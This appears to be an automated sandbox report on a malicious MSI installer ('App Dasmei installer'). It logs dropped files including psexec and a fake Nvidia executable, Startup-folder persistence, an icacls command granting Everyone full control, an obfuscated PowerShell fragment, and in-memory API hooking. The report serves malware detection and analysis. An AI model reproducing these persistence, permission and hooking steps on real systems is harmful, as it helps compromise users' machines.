    Source: Binary string: C:\ReleaseAI\win\Release\custact\x86\tempFiles.pdb- source: cB1ItKbbhY.msi, MSI2B5B.tmp.2.dr
    Source: Binary string: C:\ReleaseAI\win\Release\custact\x86\viewer.pdbD source: MSI2EE6.tmp, 00000004.00000000.2147031247.0000000000B1E000.00000002.00000001.01000000.00000003.sdmp, MSI2EE6.tmp, 00000004.00000002.4580502689.0000000000B1E000.00000002.00000001.01000000.00000003.sdmp, cB1ItKbbhY.msi, MSI2B5B.tmp.2.dr
    Source: Binary string: D:\a\_work\1\s\binaries\x86ret\bin\i386\\vcruntime140.i386.pdb source: Nvidia-59226.exe, 00000012.00000002.2669622576.00000000058A1000.00000020.10000000.00040000.00000000.sdmp
    Source: Binary string: C:\ReleaseAI\win\Release\custact\x86\lzmaextractor.pdb source: cB1ItKbbhY.msi
    Source: Binary string: C:\ReleaseAI\win\Release\custact\x86\AICustAct.pdb source: cB1ItKbbhY.msi, MSI28E4.tmp.2.dr, MSI29A1.tmp.2.dr, MSI29C1.tmp.2.dr, MSI2971.tmp.2.dr
    Source: Binary string: C:\ReleaseAI\win\Release\custact\x86\viewer.pdb source: MSI2EE6.tmp, 00000004.00000000.2147031247.0000000000B1E000.00000002.00000001.01000000.00000003.sdmp, MSI2EE6.tmp, 00000004.00000002.4580502689.0000000000B1E000.00000002.00000001.01000000.00000003.sdmp, cB1ItKbbhY.msi, MSI2B5B.tmp.2.dr
    Source: Binary string: D:\a\_work\1\s\binaries\x86ret\bin\i386\\vcruntime140.i386.pdbGCTL source: Nvidia-59226.exe, 00000012.00000002.2669622576.00000000058A1000.00000020.10000000.00040000.00000000.sdmp
    Source: Binary string: C:\ReleaseAI\win\Release\custact\x86\tempFiles.pdb source: cB1ItKbbhY.msi, MSI2B5B.tmp.2.dr

    Data Obfuscation

    barindex
    Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeAnti Malware Scan Interface: FromBase64String('QwA6AFwATgB2AGkAZABpAGEA')))${f9bb78b0edf5474dac7fd2bfa5a929c4} = Get-Random -Minimum 10000 -Maximum 99999${159d02cf6c7b473990f4b55553ac77fb} = $ExecutionContext.InvokeCommand.Expand
    Source: initial sampleStatic PE information: section where entry point is pointing to: .2"V
    Source: dummy_app.exe.2.drStatic PE information: section name: .didata
    Source: .bkp.2.drStatic PE information: section name: .didata
    Source: play.exe.6.drStatic PE information: section name: .!Zx
    Source: play.exe.6.drStatic PE information: section name: .]#m
    Source: play.exe.6.drStatic PE information: section name: .2"V
    Source: C:\Windows\Installer\MSI2EE6.tmpCode function: 4_2_00AF9F30 push ecx; ret 4_2_00AF9F43
    Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeCode function: 6_2_00007FFD340B78CB push ebx; retf 6_2_00007FFD340B796A
    Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeCode function: 6_2_00007FFD340B80BD push ebx; ret 6_2_00007FFD340B816A
    Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeCode function: 6_2_00007FFD340B817B push ebx; ret 6_2_00007FFD340B816A
    Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeCode function: 6_2_00007FFD340B816B push ebx; ret 6_2_00007FFD340B816A
    Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeCode function: 6_2_00007FFD34187BA8 pushad ; retn 7B5Fh6_2_00007FFD34187E71
    Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeCode function: 6_2_00007FFD34186DCC push eax; iretd 6_2_00007FFD34186DCD
    Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeCode function: 6_2_00007FFD3444610D push esp; ret 6_2_00007FFD34446139
    Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeCode function: 6_2_00007FFD344423B3 push 8B485F67h; iretd 6_2_00007FFD344423BB

    Persistence and Installation Behavior

    barindex
    Source: C:\Windows\System32\msiexec.exeExecutable created and started: C:\Windows\Installer\MSI2EE6.tmpJump to behavior
    Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: \KnownDlls\BitsProxy.dllJump to behavior
    Source: C:\Windows\SysWOW64\msiexec.exeFile created: C:\Users\user\AppData\Local\Temp\psexec.exeJump to dropped file
    Source: C:\Windows\System32\msiexec.exeFile created: C:\Windows\Installer\MSI2971.tmpJump to dropped file
    Source: C:\Windows\System32\msiexec.exeFile created: C:\Windows\Installer\MSI28E4.tmpJump to dropped file
    Source: C:\Windows\System32\msiexec.exeFile created: C:\Windows\Installer\MSI2A10.tmpJump to dropped file
    Source: C:\Windows\System32\msiexec.exeFile created: C:\Windows\Installer\MSI2EE6.tmpJump to dropped file
    Source: C:\Windows\System32\msiexec.exeFile created: C:\Program Files (x86)\Dasmei support\App Dasmei installer\dummy_app.exeJump to dropped file
    Source: C:\Windows\System32\msiexec.exeFile created: C:\Program Files (x86)\Dasmei support\App Dasmei installer\psexec.exeJump to dropped file
    Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeFile created: C:\Nvidia-59226\play.exeJump to dropped file
    Source: C:\Windows\System32\msiexec.exeFile created: C:\Windows\Installer\MSI29C1.tmpJump to dropped file
    Source: C:\Windows\System32\msiexec.exeFile created: C:\Program Files (x86)\Dasmei support\App Dasmei installer\.bkpJump to dropped file
    Source: C:\Windows\System32\msiexec.exeFile created: C:\Windows\Installer\MSI2A6F.tmpJump to dropped file
    Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeFile created: C:\Nvidia-59226\Nvidia-59226.exe (copy)Jump to dropped file
    Source: C:\Windows\System32\msiexec.exeFile created: C:\Windows\Installer\MSI29A1.tmpJump to dropped file
    Source: C:\Windows\System32\msiexec.exeFile created: C:\Windows\Installer\MSI2971.tmpJump to dropped file
    Source: C:\Windows\System32\msiexec.exeFile created: C:\Windows\Installer\MSI28E4.tmpJump to dropped file
    Source: C:\Windows\System32\msiexec.exeFile created: C:\Windows\Installer\MSI2A10.tmpJump to dropped file
    Source: C:\Windows\System32\msiexec.exeFile created: C:\Windows\Installer\MSI2EE6.tmpJump to dropped file
    Source: C:\Windows\System32\msiexec.exeFile created: C:\Windows\Installer\MSI29C1.tmpJump to dropped file
    Source: C:\Windows\System32\msiexec.exeFile created: C:\Windows\Installer\MSI2A6F.tmpJump to dropped file
    Source: C:\Windows\System32\msiexec.exeFile created: C:\Windows\Installer\MSI29A1.tmpJump to dropped file
    Source: C:\Windows\System32\msiexec.exeFile created: C:\Program Files (x86)\Dasmei support\App Dasmei installer\.bkpJump to dropped file
    Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeFile created: C:\Users\user\AppData\Roaming\Microsoft\Windows\Start Menu\Programs\Startup\Nvidia-59226.lnkJump to behavior
    Source: C:\Windows\System32\msiexec.exeFile created: C:\ProgramData\Microsoft\Windows\Start Menu\Programs\App Dasmei installerJump to behavior
    Source: C:\Windows\System32\msiexec.exeFile created: C:\ProgramData\Microsoft\Windows\Start Menu\Programs\App Dasmei installer\dummy_app.exe.lnkJump to behavior
    Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeFile created: C:\Users\user\AppData\Roaming\Microsoft\Windows\Start Menu\Programs\Startup\Nvidia-59226.lnkJump to behavior

    Hooking and other Techniques for Hiding and Protection

    barindex
    Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeFile opened: C:\Windows\system32\WindowsPowerShell\v1.0\Modules\BitLocker\BitLocker.psd1Jump to behavior
    Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeFile opened: C:\Windows\system32\WindowsPowerShell\v1.0\Modules\BitLocker\BitLocker.psd1Jump to behavior
    Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeFile opened: C:\Windows\system32\WindowsPowerShell\v1.0\Modules\BitLocker\BitLocker.psd1Jump to behavior
    Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeFile opened: C:\Windows\system32\WindowsPowerShell\v1.0\Modules\BitLocker\en-US\BitLocker.psd1Jump to behavior
    Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeFile opened: C:\Windows\system32\WindowsPowerShell\v1.0\Modules\BitLocker\en-US\BitLocker.psd1Jump to behavior
    Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeFile opened: C:\Windows\system32\WindowsPowerShell\v1.0\Modules\BitLocker\BitLocker.psd1Jump to behavior
    Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeFile opened: C:\Windows\system32\WindowsPowerShell\v1.0\Modules\BitLocker\en-US\BitLocker.psd1Jump to behavior
    Source: C:\Nvidia-59226\Nvidia-59226.exeMemory written: PID: 7556 base: 1A00005 value: E9 8B 2F 98 75 Jump to behavior
    Source: C:\Nvidia-59226\Nvidia-59226.exeMemory written: PID: 7556 base: 77382F90 value: E9 7A D0 67 8A Jump to behavior
    Source: C:\Nvidia-59226\Nvidia-59226.exeMemory written: PID: 7556 base: 1A10005 value: E9 5B 2E 97 75 Jump to behavior
    Source: C:\Nvidia-59226\Nvidia-59226.exeMemory written: PID: 7556 base: 77382E60 value: E9 AA D1 68 8A Jump to behavior
    Source: C:\Nvidia-59226\Nvidia-59226.exeMemory written: PID: 7556 base: 1A20005 value: E9 EB 3E 96 75 Jump to behavior
    Source: C:\Nvidia-59226\Nvidia-59226.exeMemory written: PID: 7556 base: 77383EF0 value: E9 1A C1 69 8A Jump to behavior
    Source: C:\Nvidia-59226\Nvidia-59226.exeMemory written: PID: 7556 base: 1B60005 value: E9 DB 2F 82 75 Jump to behavior
    Source: C:\Nvidia-59226\Nvidia-59226.exeMemory written: PID: 7556 base: 77382FE0 value: E9 2A D0 7D 8A Jump to behavior
    Source: C:\Nvidia-59226\Nvidia-59226.exeMemory written: PID: 7556 base: 1B70005 value: E9 BB 2D 81 75 Jump to behavior
    Source: C:\Nvidia-59226\Nvidia-59226.exeMemory written: PID: 7556 base: 77382DC0 value: E9 4A D2 7E 8A Jump to behavior
    Source: C:\Nvidia-59226\Nvidia-59226.exeMemory written: PID: 7556 base: 1B80005 value: E9 CB 2A 80 75 Jump to behavior
    Source: C:\Nvidia-59226\Nvidia-59226.exeMemory written: PID: 7556 base: 77382AD0 value: E9 3A D5 7F 8A Jump to behavior
    Source: C:\Nvidia-59226\Nvidia-59226.exeMemory written: PID: 7556 base: 1B90005 value: E9 7B 2B 7F 75 Jump to behavior
    Source: C:\Nvidia-59226\Nvidia-59226.exeMemory written: PID: 7556 base: 77382B80 value: E9 8A D4 80 8A Jump to behavior
    Source: C:\Nvidia-59226\Nvidia-59226.exeMemory written: PID: 7556 base: 1BA0005 value: E9 1B 2F 7E 75 Jump to behavior
    Source: C:\Nvidia-59226\Nvidia-59226.exeMemory written: PID: 7556 base: 77382F20 value: E9 EA D0 81 8A Jump to behavior
    Source: C:\Nvidia-59226\Nvidia-59226.exeMemory written: PID: 7556 base: 1BB0005 value: E9 FB 2C 7D 75 Jump to behavior
    Source: C:\Nvidia-59226\Nvidia-59226.exeMemory written: PID: 7556 base: 77382D00 value: E9 0A D3 82 8A Jump to behavior
    Source: C:\Nvidia-59226\Nvidia-59226.exeMemory written: PID: 7556 base: 1BC0005 value: E9 DB 2D 7C 75 Jump to behavior
    Source: C:\Nvidia-59226\Nvidia-59226.exeMemory written: PID: 7556 base: 77382DE0 value: E9 2A D2 83 8A Jump to behavior
    Source: C:\Nvidia-59226\Nvidia-59226.exeMemory written: PID: 7556 base: 1BD0005 value: E9 AB 3E 7B 75 Jump to behavior
    Source: C:\Nvidia-59226\Nvidia-59226.exeMemory written: PID: 7556 base: 77383EB0 value: E9 5A C1 84 8A Jump to behavior
    Source: C:\Nvidia-59226\Nvidia-59226.exeMemory written: PID: 7556 base: 1BE0005 value: E9 2B 2F 7A 75 Jump to behavior
    Source: C:\Nvidia-59226\Nvidia-59226.exeMemory written: PID: 7556 base: 77382F30 value: E9 DA D0 85 8A Jump to behavior
    Source: C:\Nvidia-59226\Nvidia-59226.exeMemory written: PID: 7556 base: 1EE0005 value: E9 9B 2F 4A 75 Jump to behavior
    Source: C:\Nvidia-59226\Nvidia-59226.exeMemory written: PID: 7556 base: 77382FA0 value: E9 6A D0 B5 8A Jump to behavior
    Source: C:\Nvidia-59226\Nvidia-59226.exeMemory written: PID: 7556 base: 1EF0005 value: E9 0B 2D 49 75 Jump to behavior
    Source: C:\Nvidia-59226\Nvidia-59226.exeMemory written: PID: 7556 base: 77382D10 value: E9 FA D2 B6 8A Jump to behavior
    Source: C:\Nvidia-59226\Nvidia-59226.exeMemory written: PID: 7556 base: 1F00005 value: E9 CB 3B 48 75 Jump to behavior
    Source: C:\Nvidia-59226\Nvidia-59226.exeMemory written: PID: 7556 base: 77383BD0 value: E9 3A C4 B7 8A Jump to behavior
    Source: C:\Nvidia-59226\Nvidia-59226.exeMemory written: PID: 7556 base: 1F10005 value: E9 2B 2D 47 75 Jump to behavior
    Source: C:\Nvidia-59226\Nvidia-59226.exeMemory written: PID: 7556 base: 77382D30 value: E9 DA D2 B8 8A Jump to behavior
    Source: C:\Nvidia-59226\Nvidia-59226.exeMemory written: PID: 7556 base: 1F20005 value: E9 4B 47 46 75 Jump to behavior
    Source: C:\Nvidia-59226\Nvidia-59226.exeMemory written: PID: 7556 base: 77384750 value: E9 BA B8 B9 8A Jump to behavior
    Source: C:\Nvidia-59226\Nvidia-59226.exeMemory written: PID: 7556 base: 1F30005 value: E9 BB 2C 45 75 Jump to behavior
    Source: C:\Nvidia-59226\Nvidia-59226.exeMemory written: PID: 7556 base: 77382CC0 value: E9 4A D3 BA 8A Jump to behavior
    Source: C:\Nvidia-59226\Nvidia-59226.exeMemory written: PID: 7556 base: 1F40005 value: E9 8B 3B 44 75 Jump to behavior
    Source: C:\Nvidia-59226\Nvidia-59226.exeMemory written: PID: 7556 base: 77383B90 value: E9 7A C4 BB 8A Jump to behavior
    Source: C:\Nvidia-59226\Nvidia-59226.exeMemory written: PID: 7556 base: 1F50005 value: E9 5B 2B 43 75 Jump to behavior
    Source: C:\Nvidia-59226\Nvidia-59226.exeMemory written: PID: 7556 base: 77382B60 value: E9 AA D4 BC 8A Jump to behavior
    Source: C:\Nvidia-59226\Nvidia-59226.exeMemory written: PID: 7556 base: 1F60005 value: E9 6B 2B 42 75 Jump to behavior
    Source: C:\Nvidia-59226\Nvidia-59226.exeMemory written: PID: 7556 base: 77382B70 value: E9 9A D4 BD 8A Jump to behavior
    Source: C:\Nvidia-59226\Nvidia-59226.exeMemory written: PID: 7796 base: 1A00005 value: E9 8B 2F 98 75
    Source: C:\Nvidia-59226\Nvidia-59226.exeMemory written: PID: 7796 base: 77382F90 value: E9 7A D0 67 8A
    Source: C:\Nvidia-59226\Nvidia-59226.exeMemory written: PID: 7796 base: 1A10005 value: E9 5B 2E 97 75
    Source: C:\Nvidia-59226\Nvidia-59226.exeMemory written: PID: 7796 base: 77382E60 value: E9 AA D1 68 8A
    Source: C:\Nvidia-59226\Nvidia-59226.exeMemory written: PID: 7796 base: 1A20005 value: E9 EB 3E 96 75
    Source: C:\Nvidia-59226\Nvidia-59226.exeMemory written: PID: 7796 base: 77383EF0 value: E9 1A C1 69 8A
    Source: C:\Nvidia-59226\Nvidia-59226.exeMemory written: PID: 7796 base: 1B50005 value: E9 DB 2F 83 75
    Source: C:\Nvidia-59226\Nvidia-59226.exeMemory written: PID: 7796 base: 77382FE0 value: E9 2A D0 7C 8A
    Source: C:\Nvidia-59226\Nvidia-59226.exeMemory written: PID: 7796 base: 1B60005 value: E9 BB 2D 82 75
    Source: C:\Nvidia-59226\Nvidia-59226.exeMemory written: PID: 7796 base: 77382DC0 value: E9 4A D2 7D 8A
    Source: C:\Nvidia-59226\Nvidia-59226.exeMemory written: PID: 7796 base: 1B70005 value: E9 CB 2A 81 75
    Source: C:\Nvidia-59226\Nvidia-59226.exeMemory written: PID: 7796 base: 77382AD0 value: E9 3A D5 7E 8A
    Source: C:\Nvidia-59226\Nvidia-59226.exeMemory written: PID: 7796 base: 1B80005 value: E9 7B 2B 80 75
    Source: C:\Nvidia-59226\Nvidia-59226.exeMemory written: PID: 7796 base: 77382B80 value: E9 8A D4 7F 8A
    Source: C:\Nvidia-59226\Nvidia-59226.exeMemory written: PID: 7796 base: 1B90005 value: E9 1B 2F 7F 75
    Source: C:\Nvidia-59226\Nvidia-59226.exeMemory written: PID: 7796 base: 77382F20 value: E9 EA D0 80 8A
    Source: C:\Nvidia-59226\Nvidia-59226.exeMemory written: PID: 7796 base: 1BA0005 value: E9 FB 2C 7E 75
    Source: C:\Nvidia-59226\Nvidia-59226.exeMemory written: PID: 7796 base: 77382D00 value: E9 0A D3 81 8A
    Source: C:\Nvidia-59226\Nvidia-59226.exeMemory written: PID: 7796 base: 1EA0005 value: E9 DB 2D 4E 75
    Source: C:\Nvidia-59226\Nvidia-59226.exeMemory written: PID: 7796 base: 77382DE0 value: E9 2A D2 B1 8A
    Source: C:\Nvidia-59226\Nvidia-59226.exeMemory written: PID: 7796 base: 1EB0005 value: E9 AB 3E 4D 75
    Source: C:\Nvidia-59226\Nvidia-59226.exeMemory written: PID: 7796 base: 77383EB0 value: E9 5A C1 B2 8A
    Source: C:\Nvidia-59226\Nvidia-59226.exeMemory written: PID: 7796 base: 1EC0005 value: E9 2B 2F 4C 75
    Source: C:\Nvidia-59226\Nvidia-59226.exeMemory written: PID: 7796 base: 77382F30 value: E9 DA D0 B3 8A
    Source: C:\Nvidia-59226\Nvidia-59226.exeMemory written: PID: 7796 base: 1ED0005 value: E9 9B 2F 4B 75
    Source: C:\Nvidia-59226\Nvidia-59226.exeMemory written: PID: 7796 base: 77382FA0 value: E9 6A D0 B4 8A
    Source: C:\Nvidia-59226\Nvidia-59226.exeMemory written: PID: 7796 base: 1EE0005 value: E9 0B 2D 4A 75
    Source: C:\Nvidia-59226\Nvidia-59226.exeMemory written: PID: 7796 base: 77382D10 value: E9 FA D2 B5 8A
    Source: C:\Nvidia-59226\Nvidia-59226.exeMemory written: PID: 7796 base: 1EF0005 value: E9 CB 3B 49 75
    Source: C:\Nvidia-59226\Nvidia-59226.exeMemory written: PID: 7796 base: 77383BD0 value: E9 3A C4 B6 8A
    Source: C:\Nvidia-59226\Nvidia-59226.exeMemory written: PID: 7796 base: 1F00005 value: E9 2B 2D 48 75
    Source: C:\Nvidia-59226\Nvidia-59226.exeMemory written: PID: 7796 base: 77382D30 value: E9 DA D2 B7 8A
    Source: C:\Nvidia-59226\Nvidia-59226.exeMemory written: PID: 7796 base: 1F10005 value: E9 4B 47 47 75
    Source: C:\Nvidia-59226\Nvidia-59226.exeMemory written: PID: 7796 base: 77384750 value: E9 BA B8 B8 8A
    Source: C:\Nvidia-59226\Nvidia-59226.exeMemory written: PID: 7796 base: 1F20005 value: E9 BB 2C 46 75
    Source: C:\Nvidia-59226\Nvidia-59226.exeMemory written: PID: 7796 base: 77382CC0 value: E9 4A D3 B9 8A
    Source: C:\Nvidia-59226\Nvidia-59226.exeMemory written: PID: 7796 base: 1F30005 value: E9 8B 3B 45 75
    Source: C:\Nvidia-59226\Nvidia-59226.exeMemory written: PID: 7796 base: 77383B90 value: E9 7A C4 BA 8A
    Source: C:\Nvidia-59226\Nvidia-59226.exeMemory written: PID: 7796 base: 1F40005 value: E9 5B 2B 44 75
    Source: C:\Nvidia-59226\Nvidia-59226.exeMemory written: PID: 7796 base: 77382B60 value: E9 AA D4 BB 8A
    Source: C:\Nvidia-59226\Nvidia-59226.exeMemory written: PID: 7796 base: 1F50005 value: E9 6B 2B 43 75
    Source: C:\Nvidia-59226\Nvidia-59226.exeMemory written: PID: 7796 base: 77382B70 value: E9 9A D4 BC 8A
    Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess created: C:\Windows\System32\icacls.exe "C:\Windows\system32\icacls.exe" C:\Nvidia-59226 /grant Everyone:F /T /C
    Source: C:\Windows\System32\msiexec.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
    Source: C:\Windows\System32\msiexec.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
    Source: C:\Windows\System32\msiexec.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
    Source: C:\Windows\System32\msiexec.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
    Source: C:\Windows\System32\msiexec.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
    Source: C:\Windows\System32\msiexec.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
    Source: C:\Windows\System32\msiexec.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
    Source: C:\Windows\System32\msiexec.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
    Source: C:\Windows\System32\msiexec.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
    Source: C:\Windows\System32\msiexec.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
    Source: C:\Windows\System32\msiexec.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
    Source: C:\Windows\System32\msiexec.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
    Source: C:\Windows\System32\msiexec.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
    Source: C:\Windows\System32\msiexec.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
    Source: C:\Windows\System32\msiexec.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
    Source: C:\Windows\System32\msiexec.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
    Source: C:\Windows\System32\msiexec.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
    Source: C:\Windows\System32\msiexec.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
    Source: C:\Windows\System32\msiexec.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
    Source: C:\Windows\System32\msiexec.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
    Source: C:\Windows\System32\msiexec.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
    Source: C:\Windows\System32\msiexec.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
    Source: C:\Windows\System32\msiexec.exeProcess information set: NOGPFAULTERRORBOXJump to behavior
    Source: C:\Windows\Installer\MSI2EE6.tmpProcess information set: NOGPFAULTERRORBOXJump to behavior
    Source: C:\Windows\Installer\MSI2EE6.tmpProcess information set: NOGPFAULTERRORBOXJump to behavior
    Source: C:\Windows\Installer\MSI2EE6.tmpProcess information set: NOOPENFILEERRORBOXJump to behavior
    Source: C:\Windows\Installer\MSI2EE6.tmpProcess information set: NOGPFAULTERRORBOXJump to behavior
    Source: C:\Windows\Installer\MSI2EE6.tmpProcess information set: NOGPFAULTERRORBOXJump to behavior
    Source: C:\Windows\Installer\MSI2EE6.tmpProcess information set: NOGPFAULTERRORBOXJump to behavior
    Source: C:\Windows\Installer\MSI2EE6.tmpProcess information set: NOGPFAULTERRORBOXJump to behavior
    Source: C:\Windows\Installer\MSI2EE6.tmpProcess information set: NOGPFAULTERRORBOXJump to behavior
    Source: C:\Windows\Installer\MSI2EE6.tmpProcess information set: NOGPFAULTERRORBOXJump to behavior
    Source: C:\Windows\Installer\MSI2EE6.tmpProcess information set: NOGPFAULTERRORBOXJump to behavior
    Source: C:\Windows\Installer\MSI2EE6.tmpProcess information set: NOGPFAULTERRORBOXJump to behavior
    Source: C:\Program Files (x86)\Dasmei support\App Dasmei installer\psexec.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
    Source: C:\Program Files (x86)\Dasmei support\App Dasmei installer\psexec.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
    Source: C:\Program Files (x86)\Dasmei support\App Dasmei installer\psexec.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
    Source: C:\Program Files (x86)\Dasmei support\App Dasmei installer\psexec.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
    Source: C:\Program Files (x86)\Dasmei support\App Dasmei installer\psexec.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
    Source: C:\Program Files (x86)\Dasmei support\App Dasmei installer\psexec.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
    Source: C:\Program Files (x86)\Dasmei support\App Dasmei installer\psexec.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
    Source: C:\Program Files (x86)\Dasmei support\App Dasmei installer\psexec.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
    Source: C:\Program Files (x86)\Dasmei support\App Dasmei installer\psexec.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
    Source: C:\Program Files (x86)\Dasmei support\App Dasmei installer\psexec.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
    Source: C:\Program Files (x86)\Dasmei support\App Dasmei installer\psexec.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
    Source: C:\Program Files (x86)\Dasmei support\App Dasmei installer\psexec.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
    Source: C:\Program Files (x86)\Dasmei support\App Dasmei installer\psexec.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
    Source: C:\Program Files (x86)\Dasmei support\App Dasmei installer\psexec.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
    Source: C:\Program Files (x86)\Dasmei support\App Dasmei installer\psexec.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
    Source: C:\Program Files (x86)\Dasmei support\App Dasmei installer\psexec.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
    Source: C:\Program Files (x86)\Dasmei support\App Dasmei installer\psexec.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
    Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
    Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
    Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
    Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
    Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
    Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
    Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
    Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
    Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
    Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
    Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
    Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
    Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
    Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
    Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
    Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
    Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
    Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
    Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
    Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
    Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
    Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
    Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
    Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
    Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
    Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
    Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
    Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
    Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
    Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
    Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
    Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
    Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
    Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
    Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
